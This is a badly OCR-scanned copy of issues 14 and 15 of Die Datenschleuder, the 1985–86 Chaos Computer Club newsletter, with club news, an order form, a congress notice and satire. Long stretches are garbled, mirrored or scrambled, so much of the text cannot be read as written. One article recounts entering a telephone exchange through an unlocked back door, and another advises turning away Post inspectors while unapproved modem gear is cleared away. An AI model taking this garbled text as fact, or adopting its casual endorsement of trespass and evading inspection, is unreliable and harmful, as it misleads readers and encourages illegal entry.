ZU Ta setzt. Durch diesen Servo wiederum lt sich e i n S ? 9"fei,en! nach oben bewegen, bis dieser an seine obere Endabschaltung Wenn sich die Herren also nicht angemeldet haben, sollte man kommt (Microschalter). sie unter Ausdruck des tiefsten Bedauerns wieder unverrichteDie 'Anlage' wird nun so aufgebaut, da der Telefonhrer be- ter Dinge wegschicken. reits fest im Koppler drinsteckt und der besagte Hebel in Ruhe- 10/85 Sy/RAMses unnpa/\ j n 2 uaj stellung auf der Telefongabel aufliegt und diese sanft runterdrckt. Unter keinen Umstnden die darf die Feder, die die Tel.- -es sipas sseip uaijsjs u a j n a ^ e p a y uajnQ ^onja wnz jn6 B Gabel hochdrckt gegen eine 'ltere berdehnte* ausgetauscht J40IU i p o u jaqe pu|S 'umiegos spusujayosja iuunujsA euia werden, da die Gabel mit einem schwachen Motor dann sehr qone uanemua AX-AVd J9qn uajias sqoas uajn/aiaq JQ u o i j ^ e p a y aip ue ^sug ujsuia leicht runtergedrckt werden kann: Eingriffe in den POSTeigeU! os ,'so^UUOA amie qiei^saa uapja/w j|a2o^ne uau nen App. sind selbstverstndlich verboten. -BUJ9HV uassnuj jaiy 'unu|9/g jap u;q 401 A l - ^ d sep JUJUJO^ ';qoeuj UMMOS JSZJB/VUJOS jane a|p UNIAQB^jaA Jap I W , O p f e r i n d e r B a n k l s t e n e i n a n d e r a b

s s s s Z 0 0 0 0 5

a 5 E S

2 1 =

| 1 3 N o *: e

CD

E Q-^i O ja> I n c ,5r N _ <u C i r 0 ds14-4

S . . :0 i4> c. S 4> e f E 0> -C 0 > 3 r M M e O i = i w O) J U J5 M m o w 8 o O) c u u o n c o O 0 3 - 5 0 t . O T ] >-S ai 1_ _ * - == X c S > S i o s a M = = k. h. !j S o S a. o se _ _ _ _ _ _

S e .c O

iS e
JC

g is ID = K.' C J _ M g S a 0> s .l a o O g O 5 s c = 12 E o a o w X
3

Sz O t?s

to a. " E a
3 o

J a C E = o

la

0.(5

Q S !i C

Die Dresdner Bank am Gansemarkt ging am Mittwoch abend buchstblich auf Kundenfang. Wer sich an ihrem Geldautomaten mit Barem versorgen wollte, kam zwar in den Vorraum hinein - aber anschlieend nicht mehr heraus. Insgesamt waren es mehrere Dutzend Menschen, die softireine Weile eingesperrt waren. Sie muten auf den nchsten Kunden, der die elektronische Tr-Automatik von auen mit Hilfe seiner Euroscheckkarte ffnete. Was war passiert?

ill
% C Q q o Hl 3 5 e-E . o T3 c c il 41 * S 2 6,- p1

Impressum: dalenschleuder 14. Dezember 1985 Das wissenschaitiicne Fachbiait fr Datenreisenae erscheint achlmal im Jahr alie42 (!) Ta^e Verleger und VtsdHmbPG Her wart Holiand-Montz. Schwencvestr S5 D-2000 Harrburg 20 RedaHtionsadresse ebenda. etcMromsch IMCA CHAOS-TE A M "iigendruck im Selbstverlag Oatenhonverlierunq und Salz BUB Neue Jahresbezugspreise DM 60 normal. DM 30 Schuier u a ah OM 100 Forde'abo die veroltoiitiichtn Beitrage smd urheberrechtlich geschtzt VerviellaUigu^gen tur gewerbliche Zwecke \.erpfitcinen zur Gebntenzanlung an d i e VG Wort. Abt Wr Goethesir 40 8000 Mnchen 2 Weilerverbreilung m kostenlosen elektionischcn miormationsdiensten nach den in IMCA Brett Daienschieudcr. verffentlichten Vcbreitur.gsLedmguogen gestaltet die ds ist abrufbar via IMCA und angeschlossene iNTEBMAIL-Hosts COMBOX CCC NEWS BMI-NET EV emige Teielonboxen In Rt fi55.'*21 mit Be?teilservice Kopier-Re:nt iNachdruckrecht) lur nicht gewerbliche Zwccke Nur e<nwandfre-e Vorlagen der neuesten Ausgabe verwenden Kompic-tt vervielfltigen Abgabe nurKosienlrei Auszge nur mit dorn Hinweis 'ausdatenschleudci t3. C9927F Der Zusammenhang aus dem d i f Vorlage stammt sollte f k e n n b a r bleiben. Zwei Belegexemplare an die ds-fledaklion Compusknpte oer Pos! au" Ftoppy 3 5 MSDOS.'IOS/XF. 5 1'^" Srius^C64.TVT802 (n u r notfalls IBM) ode oaoiern Via D.n1' (Ojr n^ch Anbor.ir.fny) Uber ZCZC ans CHAOS-TPAM i m p r e s l 3 ws 8509?9

Alltgliches Chaos
Probleme mit einer kaputten Harddisk sowie Softwarehinundher verzgerten das Erscheinen dieser Ausgabe entschieden. Ein Hauten Text ist nicht -schienen, da wir aus Kostengrunden erst bei ber 1000 Abonnenten die Zeichenzahl pro Ausgabe erhhen werden durch mehr Seiten. Kleinere Schrift (wie in der 13) fhrte zu Proteststrmen. Die datenschieuder wird jefzt nicht mehr mit der Buchmaschine. sondern mit einem eigenen Satzsystem erstellt. Wenn es fertig ist, luft es auf einem Netzwerk aus 520ern. Die bisherige Versandabteilung schaffte die Arbeit nicht mehr (ist alles 'ehrenamtlich") und die Daten sind am "Umziehen" in die Clubrume (feuchter Keller, mehr ist finanziell nicht drin). Bei der Durchsicht des Bestandes, der aulgrund von Beschwerden dringend wurde, stellte sich heraus, da die Anzahl verschickter Exemplare deutlich grer als der Geldeingang ist: Lesertyp A bekommt die datenschleuder schon ein Jahr umsonst und Nichtlesertyp B hat bezahlt, aber nichts bekommen. A ist viel grer als B und erklrt unser finanzielle lesLoch. c3 Auerdem gab es (wohl wegen nicht abschliebaren Briefkastens) Verluste eingegangener Post bei der bisherigen O Adresse da verschwand nicht nur Bargeld aus dem Brief, ^ sondern manchmal, so unser Vedrdacht, gleich die ganze Post. Bitte deshalb NUR die neue Redaktionsadresse benuts zen: Schwenckestr. 85,2 HH 20. 2 Langsam bilden sich (ver)waitende Strukturen aus dem Chaos. Es wurde ein einheitliches Beslellformblatt entwickelt, J5 das umseitig abgedruckt ist. Ein gezielte Verschickung (rund E 15 Exemplare) an ausgesuchte Besteller ergab, da etwa 14 Jj das Bestellformblatt ordnungsgem ausgefllt zurcko schickten. Aber einer fuhr wieder voll auf die 5 DM Marken ab > Q (Satellitenantenne) und schickte entsprechend mit. Wir knII nen sie nicht gebrauchen, wie bereits kurzes Nachdenken ergibt und die Post tauscht nicht um. Vorsicht: Wir schmieden bse Racheplne gegen alle, die zu teure Briefmarken schic5 kenl ^ Wers eilig hat: Bestellungen mit diesem Formblatt werden bevorzugt bearbeitet, da es von (fast) allen CCC-MItgliedern (wie leicht einzusehen ist) bearbeitet werden kann. 2 Wichtige Informationen, Danksagungen, Schmhungen und 0) Beleidigungen sowie Liebesbriefe bitte getrennt einreichen, ra Einige Beschwerden gab es zur Hackerbibel. Bericht zur Lage: In Tag- und Nachtarbeit entstanden Anfang August die letzten Seiten in Hamburg, Dabei traten nur kleinere Katastrophen auf (zB beginnt der Telex-Artikel mit "Itumspannendes Telexnetz", die Vorlage fr die Btx-geht-Seite wurde versehentlich nicht abgeschickt und abgedruckte datenschleudern sind nur richtig sortiert, wenn Seitennummern draufstanden. Der Drucker war trotz verspteter Einiieferung pnktlich und das Buch wurde, wie in ds- ifa-Sonderausgabe angekndigt, ab 16.9. ausgeliefert. Wegen Nlchteintreffens der CCC-intern angekndigten kostenlosen Versandtten konnten bei der ersten Verschickung nur PLZ-mig niedrige Subskribenten versorgt werden, dann waren die vorsichtshalber trotzdem teuren Tten alle. Auch einige Belegexemplare wurden nicht verschickt. Und vom Bahnhofspostamt muten wir mit den zwei Zentnern zum Nachtschalter am Hhnerposten. Naja. Zwei Tage spter, als wir meinten, der Kram sei jetzt vom Tisch, rief der Gebhrenprfer an und wollte ber 100 Mark extra fr die ersten 98 Exemplare. "Werbung" sei im Buch, deshalb sei es ein Pckchen. AufS. 37 sei etwas mit Preis angeboten. Unser Widerspruch, es handle sich um einen Aprilscherz auf englisch (does your Computer sometimes cough, sneeze or have a seizure? Blitzbug 19.95 Dollar. Rezeptfrei. Nur nach Anleitung verwenden!), ward akzeptiert, der Gebpr meinte, er knne kein englisch. ber Seite FF usw. mehr an anderer Stelle in dieser Ausgabe. Abschlieend soll der verwaltungsinterne Begriff der Vernichtung durch Materietransformation ersetzt werden. Intern 14.ws 851206

Besuch bei der Post


Eigentlich wollten wir ein paar Artikel lur die nchste DS berarbeiten. Whrend wir bei Kakao-Kaffee die neuesten Antwortseiten in BTX durchgehen und ich nebenbei meinen Kontoauszug im externen Rechner der Verbraucherbank ansehen will, geschieh! Seltsames. Alle Telefone der vier Amtsleitungen "im Raum zeigen nacheinander das von Leitungsprfungen her bekannte Tickern. Und ich hatte gerade meine Kontogeheimzahl eingegeben' Ls23 nimmt den Hrer von einem der freien Apparate und versucht auf der loten Leitung mit dem Tester zu reden. Wie zu erwarten: Set Erfolg - kein Erfolg. Auch ein Anruf bei der Strungsstelle mit der Frage, ob im Fernmeldebereich Bauarbeiten durchgefhrt werden, fhrt zum selben Ergebnis. Aber wir erfuhren, wo die zustndige OVSt (Ortsvermittlungsstelle) ist. Wir beschlieen, die Leitungen selbst zu "entstren". Mit dem noch von der Fahrt zur Hannovermesse leicht verbeulten VW Variant gehts zur zustndigen OVSt. Die vordere Tr ist zu. Der Hintereingang ist zwar gut versteckt, aber wo ein Hacker ist ist auch ein Weg. Den Wagen stellen wir auf den Diensthof ab und machen uns auf die Suche nach einer offenen Tr. Sie ist schnell gefunden und durch einen Ziegelstein gesichert. Das Schild 'Dienstgebude, unbefugter Zutritt verboten!" kann uns nicht schocken, wir fhlten uns befugt. Auf dem Flur entdeckt Ls23 beim Schwarzen Brett einen Wohnungsnachweis fr Postler. den nimmt er erslmal mit Im nchsten Stock sind wir unserem Ziel nher, die seitlichen Tren sind hier aus feuerfesten Stahl, nur leider zu. Im vierten Stock werden wir endlich fndig, eine Tr isl nur angelehnt. Wir treten ein und stehen vor den Relaisschrnken. Sofort beginnen wir mit der Suche nach den gestrten Anschlssen. Pltzlich tauchen drei Fernmeldetechniker auf: "Von welcher Dienststelle kommen Sie?'. Ls23 nennt seine Tel Nr. 'Ich verfolge eine Strung im Fernmeldenetz!". Daraufhin lassen auch die letzten Gelben Herren Relaisputzbesteck und Drehwhler sinken. Der Herr der uns angesprochen hat fragt sichtlich nervs "Wie sind sie hier hereingekommen 7 ". Er kann noch immer nicht glauben, da wildfremde Leute ohne Dienstausweis in seine geheiligten Hallen eingedrungen sind. "Na, durch die Tr!'. "Die sind doch zu!". "Die durch die wir gekommen sind wars nicht!". "Welche soll das gewesen sein?". "Na die hinten zum Hof raus!". "Mu wohl jemand nicht richtig abgeschlossen haben. Was wollen sie hier berhaupt?" "Ich will wissen, ob auf meinen Anschlssen gemessen wird und was es soll Datengesprche zu stren". Es folgt die typische Beamtennotantwort: "Darber bin ich nicht berechtigt Ihnen Auskunft zu erteilen. Verlassen Sie bitte unverzglich das Gebude!". Er hat sich inzwischen gelangen, baut sich herrisch vor uns auf und deutet unmiverstndlich zur Tr. Wir wollen es nun doch nicht bertreiben und lassen uns noch bis aus dem Haus begleiten. Zum Abschied berreichen wir unserer Sicherheitsbegleitung einen Chaos-Aufkleber als Andenken. So richtig glauben kann Ich das, was ich da erlebt habe, eigentlich bis heute noch nicht! Aber mein Password (r die Verbraucherbank habe ich sofort gendert. Als ich der Dame in der Bank als Grund "Abhren von BTX durch Unbekannt" nannte, hat sie zwar etwas irritiert geguckt, aber die nderung ermglicht. Zwei Tage spter erschienen die drei Herren vom Gilb persnlich bei LS23. Sie beabsichtigten die funktionierenden Leitungen zu berprfen. Sie scheiterten. da sie es versumt hatten, sich fernmndlich anzumelden (alle vier Telefonleitungen waren bislang nie gleichzeitig defekt) und das Horoskop nicht gnstig war. Rausgehen durften sie allerdings alleine.

F o r m b l a t t T E X T / B E S T E L L . US 8 5 1 0 1 3 1 4 1 5 g l t i g b i s B e i B e d a r f i s t d i e s e s F o r m b l a t t f o t ol: o p i e r b a r .

Erscheinen

dsl^NVS:

Redaktion

Datenschleuder

Schuiencke-85

2000

Hamburg

20

?:CHAOS-TE*V-l

Rechnung

<riur

mit

S i ege 1 ) / B e s t e 1 1 f e t z en

Hamburg,

F'o t t e m p e 1 d^

H i e r m i t w i r d um E r f l l u n g l e t z t l i c h unberechenbaren cccuw cccFl cccNl cccSl cccSO 20 , 0 0 a b 230 1 20 , OCi 60 , 00 30 , 0 0 DM DM DM DM DM

dsFE dsLl dsFl dsNl dsSl dsHO

2 ,50 999 ab 60 30 0 ,99 1 00 ,00 ,00 ,00

DM DM DM DM DM DM

d e r i m f o l g e n d e n = t .c l< z a h 1 m a i g s p e z i f i z i e r t e * Wn? c h e g e b e t e n . B e i t r g e U e r e i n z u r F r d e r u n g d e s CCC Aufnahmegebhr- ( e i n m a l i g , Verwaltung) gewnschte Leitstel1ennummer: (*) Frderndes M i t g l i e d bis 31.8.86 Normales M i t g l i e d b i s 31.8.86 Schler u.. b i s 31.8.86 Schler u . . b i s 28.2.86 n a t u r g e m p o r t o f r e i und u n v e r p a c U b a r Chaos-Jahr endet m i t S c h a l t t a g oder nicht cn o> O Probeexemplar ds-aktuell E i n Abo b r i n g t U n b e k a n n t e s f t e r ! -fr 5 L e b e n s a b o ds ( w e r o d e r was l e b t lnger' ) m CO F r d e r a b o 8 Ausgaben (1 J a h r ) cn J a h r e s a b o 8 A. N o r m a 1 v e r d i e n e r S o n d e r a b o 8 A . NUR S c h l e r u..!!! -O Sonder-abo u n d H a c U e r b i b e l T e i l 1 E dsPE-dsHO j e w e i l s i n k l . Porto/Verp. Hackerbibel Teil 1 j e 10 K l e b e r CCC K a b e l s a l a t spriwasge. 1 K l e b e r Chaos Cnoten w a s s e r f e s t Kleber Achtung Abhrgefahr M p r o S t c k F o t o k o p i e n a u s dem A r c h i v laut b e i l i e g e n d e r L i s t e (nur fr Redakteure) P o r t o und V e r p a c k u n g Hackerbibei Porto, Verpackung, Trinkgeld fr Q tt Tf

dsHl dsKlO dsKCC dsAbh dsKop

3 3 , 3 3 DM 3 DM 1 , 0 0 DM 3 , 3 3 DM
-

,30

DM

PV4 FVT

4 , 00 DM DM ??? Summe : ,

den

Rest

Versand

erfolgt

nach

Geldeingang

Ich

liefere deshalb: V-Scheck DM B r - f m a r k n - , 0 5 DM B r f m a r k n - , 5 0 DM B r f m a r k r . - , 8 0 DM

_
_, ,

UJith inflation, wef-e a n e v e n b e t t e r b u y ! und in folgender Form:

das

sind

zusammen

DM

Alls rfordrlch btt sorgfltg ausftln! Nchts wchtgs wglassn! ! ! Ulr h a b n s e h n g n u g z u t u n mt V r w a l t n g s s c h f !

fibs

Da t en s c h 1 e u d e r

2HH20

C??27F
Hier Adressk1eber befestigen z w e i t e n a n h e f t e n zum V e r s c h i c k e n f a l l s n i c h t : m i n d . 1 DM T r i n k g e l d Aufschlag fr Mehrarbeit und < Adresse hier l i n k s lesbar ^ eintragen! ^ H i e r Da t u m s t e m p e l p l a t z f r V e r w a l t u n g ~o V V V <

* * * * * * * * * * *
Elektronische Mitfahrzentrale Als erste private Mailbox hat die C.L.I.N.C.H. - Box in Hamburg als zustzlichen Service fr die User eine 'elektronische Mitfahrzentrale' in Betrieb genommen. Die elektronische Mitfahrzentrale in der C.L.I.N.C.H. B o x ist natrlich rund um die Uhr unter der Rufnum-

mer 040 / 632 3517 zu erreichen. goblin/clinch

Formblatteingang

Geldeingang

Auslieferung

Archivierung
ist

Vernichtung
Tel-Vorwahl \ n .

ds14-6 < * ) L e i t s t e l 1 ennummer u m f a t C A . 4 Ziffern. S t e l l e 1 +2 t H M 40 , B e r l i n 3 0 , K i l UUI . U r > * c h e u ^ r d ^ n r \ A c h M&qA

Chaos Communication Congress '85


Die Europische Hackerparty am 27.-29. Dezember 1985 Eidelstedter Brgerhaus, Elbgaustrae 12,2000 Hamburg 54 10.00-18.00 Uhr
W a s heute n o c h w i e ein M r c h e n klingt, kann Morgen Wirklichkeit sein. Hier ist ein M r c h e n von bermorgen. Es gibt keine Kupterkabel mehr. Es gibt nur noch die Glasfaser und Terminals in j e d e m Raum. M a n siedelt auf fernen Rechnern. Die Mailboxen sind als W o h n r a u m erschlossen. Mit heute n o c h unvorstellbaren Geschwindigkeiten durcheilen C o m p u t e r - C l u b s u n s e r Datenverbundsystem, Einer dieser Computer Clubs ist d e r Chaos Computer-Club. Gigantischer Teil eines winzigen Sicherheitssystems, d a s die Erde vor der B e d r o h u n g d u r c h d e n Gilb schtzt. Begleiten wir den C C C u n d seine Mitglieder bei ihrem Patrouillendionst am Rande d e r Unkenntlichkeit.

atendileubet
15 = Mrz 1986
Das wissenschaftliche Fachblatt Itir Datenreisende
Em O ' y a n d e s C h a o s C o m p u t e r Club

C9927F DM 2,50 Produktionsbe-

Postprfplaketten ginn

Viromat plus

Programm

des Jahres

1986

DAS Treffen fr Datenreisende! Telefon, Datex, Btx, Mailboxbetrieb, Telex, Datenfunk, Videovorfhrung. Aktive Workshops. Video- & Papercopiers

Zum Einfhrungspreis von DM 19,97 ist jetzt der Viromat Plus Version 0.0 fr verschiedene Rechner erhltlich das Mu fr jeden Hacker. Das Neue Hacker-Universallexikon zum Themar "Viren (lot), sehr kleine, im Ultramikroskop sichtbare, ganz oder zum grten Teil aus Bitketten bestehende Krper von kugelbis stbchenfrmiger Gestalt (0 bis 1), parasitr, auerordentlich virulent. Wenig differenzierte Krankheitserreger (z. B. Croyppe, Poliovaxitis, Mosern64). An der Grenze zwischen belebter und unbelebter Intelligenz; Vermehrung nur im Wirtsregisterbereich; viele Viruserkrankungen erzeugen lebenslngliche Immunitt, daher vorbeugende aktive Immunisierung vielfach erfolgreich." Fr eine Dauer von 6 Monaten und bei normaler Anwendung wird gewhrleistet, da Material und Herstellung der Diskette, auf der Ihr Virus gespeichert ist, frei von Fehlern sind. Da es nach gegenwrtiger Technik nicht mglich ist, einen Virus so zu entwickeln, da er, insbesondere im Zusammenhang mit anderen Viren, fehlerlos arbeitet, entfllt jegliche Garantie. Normalerweise betrgt der lythische Infektionszyklus etwa 30 Nanojahre und bewirkt dauerhafte Viroimmunitt. viroma15.ws 851218

Zum ersten Jahrestag der Btx- Fernmelderechnung von ber 130.000 D M wird die gute (?) alte (!) Ftz- Nummer durch das neue "DBP- Zulassungszeichen" ersetzt. W e r noch Gerte mit Ftz-Nummer hat, mu nicht besorgt sein, da diese vom 1. April an nicht mehr den zum Teil unberechtigten Vorschriften der DBP entspricht, denn "die bisher vergebenen FTZ-Nummern gelten weiter, solange die Zulassungen nicht erlschen und widerufen werden". So sieht das neue Zeichen aus:

Telecontrol - w i e g e h t d a s ? Eintritt: Mitglieder Private Kongressteilnehmer Presse Gewerbliche Teilnehmer DM DM DM DM 20,30, 50, 100,
M i t sechs Tasten von "sehr schlecht" bis "ausgezeichnet" knnen von Medienkontrollftrmen bezahlte Fernsehzuschauer das Programm bewerten. Eine Kantroiimaschine mit Telefonanschlu und Modem steht in den betreffenden Wohnzimmern. Im Dunkel jeder Nacht ruft der Datensammelcomputer dort an und die Doten ab. Sie werden aufbereitet und am nchsten Tog ob elf Uhr kann ein kleiner Haufen Medienkontrolleure dotenmig abrufen, wer was gesehen hat. Die lassen sich den Spa zweistellige Millionensummen pro Jahr kosten, damit verkrzt ausgedrckt der Vizeprsident eines Getrnkekonzerns mit weltweitem Abfllsystem auf einem Kongre in Hamburg verknden darf, da sie fr Fernsehwerbung in der BRD nur 44% des lokalen Budgets ausgeben, in Brasilien dagegen 90%. Bei uns seien whrend der "ungnstigen" Werbezeit nur rund 28% der erieselungsmaschinen angestellt. Da suchen die Konzerne sich etwas anderes fr die Werbung. Im Moment entbrennt der Kampf um die TV-Satellitenporkpltze am Himmel. "Der Mensch konsumiert Informationen, die er nicht mehr berblicken, geschweige denn kontrollieren kann. Seine kommunikativen Fhigkeiten verkmmern" schreibt eine politische W o chenzeitung. telctll5.ws 851220

Voranmeldung durch berweisung auf Postgiro 5 5 1 2 57/204 PschA Hamburg Sonderkonto CJS. Wernry

Ober kurz oder lang wird das gute (!) alte (I (aber (noch) nicht veraltete...)) Datenklo eine Ftz- Nummer (sorry) ein DBP- Zulassungszeichen erholten. Denkt darber nach, wie sich dieses Zeichen am effizientesten per Computer und Matrix/Laserdrucker erstellen lt, damit Ihr eure Klo's mit Testausdrucken tapezieren knnt. Weiter im (Post-)Text: "Nhere Einzelheiten zur Kennzeichnung zugelassener Fernmeldeeinrichtungen knnen dem Amtsblatt 128/1985 entnommen werden." Z Z F L M B3240vom 13.11.1985 P.S.: Die Vorschriften ber die Wischfestigkeit von Ftz-Nummern bzw. DBP-Zulassungszeichen sind im Gegensatz zu den Vorschriften, die die Technik betreffen, nicht gengend definiert, da es schon zu Beschlagnahme eines Akustikkopplers Typ Dataphon S-21D gekommen ist, weil die Ftz-Nummer durcn hufigen Gebrauch stark verwischt war und die Polizei deswegen bezweifelte, da der in dsl4 genannte Koppler berhaupt eine besitzt. esco/ls38 / x i / w s / f t z n e u l 5.ws 860323 1522 die datenschleuder 15, Mrz 1986 das wissenschaftliche fachblatt fr datenreisende D-2000 Hamburg 20 Schwenckestrae 85 Geonet: G e o l :Chaos-Team Brett Datenschleuder Btx: * 6 5 5 3 2 1 # Herausgeber und ViSdPG Herwart Holland-Moritz Mitarbeiter dieser Ausgabe (u.a.) R. Schrutzki, S.Wernery, A.Eichler, P.Franck, H.Gruel, M.Khn Eigendruck im Selbstverlag. Mrz 1986

Pafoto mitbringen!

S ^ p u t e irr

Btx 655322

Seite 1

Datensehleuder
15 = Mr2 1986

Trara die Post ist d a ! Hinweise fr Ausflle d e r d r i t t e n A r t


Trara die Post ist da Hinweise fr Ausflle der dritten Art Der Redaktion sind in letzter Zeit vermehrt Berichte zugegangen, aus denen klar hervorgeht, da immer noch gewisse Unsicherheiten herrschen, wenn es um den Umgang mit dem grten Dienstleistungsunternehmen in diesem unserem Lande geht. W i r wollen daher noch einmal zusammenfassen, wie man sich tunlichst zu verhalten hat, wenn es zu staatlichen Ausfllen wg. Postkommt. . . Oberster Grundsatz ist auch hier: keep cool! Nichts wird so hei gegessen, wie es gekocht wird und man kann viel Unheil abwenden, wenn man sich informiert, bevor irgendwelche Kinder in ominse Brunnen fallen. Wer sich nicht sachkundig macht, bevor er zum Beispiel ein Modem anschliet, handelt grob fahrlssig und mte eigentlich wegen Dummheit noch eins obendrauf kriegen. Grundlage fr alles Hondeln der Post ist in unserem speziellen Fachgebiet die Fernmeldeordnung mit den dazugehrigen Verwaltungsanweisungen. Letztere sagen aus, was mit den Paragraphen der FO wirklich gemeint ist, sie sind also fr uns besonders wichtig. Wer dafr gengend Kohle locker machen kann, sollte sich den Kram bestellen, wobei es sehr unfein ist, die Leute im nchstbesten Telefonldchen deswegen in Verlegenheit zu bringen. Bestellt den Kram beim zustndigen Fernmeldeamt, die Verwaltungsbeamten da wollen jo auch mal was andres tun. Wer sich das nicht leisten kann, mu mit unseren Tips zufrieden sein. Es gibt drei Stadien von postolischen Ausfllen. Nummer eins ist ein berraschender Anruf: 'Mller, Fernmeldeamt brabbel.. . wir haben festgestellt... usw'. In diesem Fall empfiehlt es sich, dem netten Beamten die FTZ.Nr. des eigenen Kopplers mitzuteilen und ihn darauf hinzuweisen, da man ausschlielich mit diesem Gert ttig wird. Sollte er den Verdacht, man benutze unpostalische Gerte, wiederholen, empfiehlt sich die Papageientakfik: 'Ich sagte doch bereits, ich benutze ausschlielich einen Koppler mit der FTZ.Nr. 18.13.1808.00 der Firma E....' Gegebenenrolls so lange wiederholen, bis der nette Herr aufgibt. Stufe zwei zuendet mit einem berraschenden Schellen der Trglocke. Zwei bis drei nette Herren prsentieren ihren Dienstausweis und bitten mehr oder weniger hflich um Zutritt. Empfohlene Reaktion: Hflich um nhere Betrachtung der Ausweise bitten. Falls das Ansinnen abgelehnt wird, Zutritt verweigern, die Herren sind verpflichtet, sich auszuweisen. Ausweise sorgfltig prfen (in der Zwischenzeit besteht Gelegenheit fr zufllig anwesende sachkundige Besucher, aufzurumen). Besonderes Augenmerk auf die Gltigkeit der Ausweise richten, das Verfalldatum ist noch vor dem Namen des Inhabers vermerkt. Bei ungltigem Ausweis: Zutritt verweigern. Bestehen hinsichtlich der Ausweise keine Bedenken, einen Blick auf die Uhr werfen. Zutritt braucht nur whrend der blichen Geschftszeiten gewhrt zu werden. Das legen wir einmal bankmig aus und verwehren in der zeit von 18.00 bis 07.00 uhr ohnehin den Zutritt. Sodann fragen wir die Herren, ob sie sich angemeldet htten. W i r d dies verneint, oder ist sicher, da eine Anmeldung nicht erfolgt ist, drcken wir unser Bedauern aus und verabschieden die Herren. Sehr hilfreich ist dabei die Floskel: 'Es tut mir ja ausgesprochen leid, aber meine Frau (Freund(in),Bekannte(rj) is grad unter der Dusche.. .kommen sie doch n andermal wieder, ja ?' Stufe drei ist die gefhrlichste, hierbei erscheinen wiederum mehrere Herren, diesmal ist aber auch jemand von der Staatsanwaltschaft dabei und prsentiert zustzlich zum Ausweis einen richterlichen Durchsuchungsbeschlu. Hier hilft eigentlich nichts mehr, auer man ist vorgewarnt und vermeidef diese Konfliktsituation, indem man nur whrend der eigentlichen etriebszeit die Anlagen angeklemmt hat.Zu jedem anderen Zeitpunkt sollte eine ordnungsgeme Fernsprechanlage vorhanden und angeschlossen sein..

beite

2
Kinder sind Chaoten . . . sie springen bei jeder Gelgenheit aus den fr sie prparierten Entwicklungsmustern heraus, zerstren die die Entwicklung grndenden Ordnungen, greifen sie a n . . . . Vor der Schulstunde . . . Erst dann, wenn Du sicher bist, alle zu beherrschen, kannst Du mit dem Unterricht anfangen. . . . Die togliche Hauptarbeit richtet sich gegen die Schler. Sie findet nicht mit ihnen statt. Der Schulunterricht hat durchaus Zge von Grabenkrieg. Beide Seiten haben sich eingerichtet. . . . Geschrei ist kein Herrschaftsinstrument. Es enthllt die Hilflosigkeit. Unsichtbare berwachung . . . Unsichtbarkeit ist Bedingung fr das Funktionieren des berwachungssystems. . . . Kein kommunikativer Akt, der nicht unter den Augen des Lehrers (oder sonstwem, Anm. ds) vollzogen werden mte. Kommentarder Redaktion: Ein Buch, das Einschrnkungen informationeller Selbstbestimmung im Alltag gut beschreibt. Die Verallgemeinerung vom Lehrer hinter den Rcken der Klasse zur unsichtbaren berwachung bei Telefon und Telekommunikation etc. mu der Leser leisten. Schon die gut gegliederte Lehreranalyse macht das W e r k zu einem Handbuch im Grobenkrieq fr beide Seiten, etdo Schulszenen. Vom Herrschen und vom Leiden. Friedrich Thiemann. ISBN 3-518-11831 -3 D M 1 0, rund 4 Pfennig pro KB.

Noch etwas: Beschlagnahme von Gerten kann in jedem Fall nicht durch die Post erfolgen, sondern nur durch Polizei oder Staatsanwaltschaft. Postler haben die Anweisung: 'Die nicht ordnungsgemen Gerte werden dem Teilnehmer unter Hinweis aufsein Fehlverhalten ausgehndigt'. Es gibt zustzlich noch eine Reihe von Manahmen, die man treffen kann ,um im Falle eines Falles gewappnet zu sein: - alle Anschludosen der Post sollten im Flur angebracht sein, die Post darf nur die Rume betreten, in denen Fernmeldeeinrichtungen vorhanden sind. Im Bedarfsfall dann das Telefon in den Flur stellen. - wenn immer mglich, Dosenanlagen verwenden. Das kostet zwar ne Markfuffzich im Monot extra, ist aber praktisch, da man im Bedarfsfall nur umstecken mu. - keine Eingriffe in den Postapparat. Lieber im Bastelladen ein Amitelefon fr 20.- DM kaufen und daran basteln. Im Falle eines Falles steht immer ein ordnungsgemes Gert parat. Ist unbedingt zu empfehlen, wenn man mit Dosenanlage arbeitet. - falls das nicht mglich ist, wenigstens ein paar Plomben frs Telefon bereithalten und notfalls den Apparat neu versiegeln lassen. /xi/ws/trpostl5,ws 860213 2210 goblin

Neue Aboableilung Nach dem Abdanken der bisherigen Aboabteilung wegen freiwilliger berlastung gab es Monate der postmigen nullnahen Grenzltigkeit. Dazu kam allgemeine berlastung, auch derCCC'85 hal einen Haufen Arbeit gemacht. Dabei ist eine Menge Post liegengeblieben (Standardfrage am Telefon: "Liegt die Bestellung mehr als drei Monate zurck?"). Jetzt hat die neue Aboabteilung die Verarbeitung eingehender Daten steuernd aufgenommen. Die frische Lieferung Hackerbibeln (im guten Buchhandel unter "Betriebssystemen" zu finden) wird, nun postgenehmigt, als Bchersendung verschickt (Eben beschwerte sich noch einer, wo seine Hackerbibel blieb, d.s.). Die neue Aboabteilung ist slolz darauf, in der letzten Woche nicht nur tagesaktuell geworden zu sein, sonden wegen gleichzeitigen Aufrumens einiger Privatstapel auch allere Posthufchen bearbeitet zu haben. Der lteste Brief stammte aus 1984. altpstl5.ws 860226 0030

Alltagserfahrung eines Hackers

Wo bitte gibts eine NUI?


Alltagserfahrung eines Hackers W o bitte gibts eine NUI? "Nun war ich es leid . Wieder war eine mhsam erkmpfte nui gesperrt worden, Warum wochenlang warten, um in den Genu der Datenbanken und Netzwerke in aller W e l t zu gelangen? Ich beschlo, mir ganz offiziell eine Nui zu besorgen. Gesagt-getan, auf zum nchsten Postamt. Do ich in HamburgBramfeld arbeite, mute ich mit einem relativ kleinen Postamt vorlieb nehmen. Rein in den Laden, aha, hinter dem Schalter sitzt einer, der nicht ganz den stumpfen Postlerblick draufhat. "Guten Tag, ich mchte gerne eine Nui fr Datex-P beantragen!" sagte ich mit freundlicher Miene. "Datex- WAS?", kam es aus dem Munde des guten Mannes. Ich erklrte ihm kurz mein Begehren. "Nee, das gibt's hier hchstens am Paketschalter." Na gut, bei Datex werden ja auch Pakete verschickt. Also auf zum Poketscholter. Ein blonder Engel hinter dem Schalter lchelte mich erwartungsvoll an. Erneut trug ich meinen Wunsch vor. "Nein, da mssen Sie an Schalter 1 gehen!", erwiderte sie mit verwirrtem Gesicht.. "Sorry Lady, da komme ich gerade her." Sie erklrte mir, ich mge kurz warten, da sie ihren Chef anrufen wolle. Als sie diesem dann erklrte, hier wolle ein Kunde Datex-P beantragen, bin ich in schallendes Gelchter ausgebrochen, was mir bse Blicke smtlicher Postler einbrachte. Man erklrte mir, der Chef wrde gleich zurckrufen, ich solle kurz warten. Nach ungefhr 5 Minuten ein 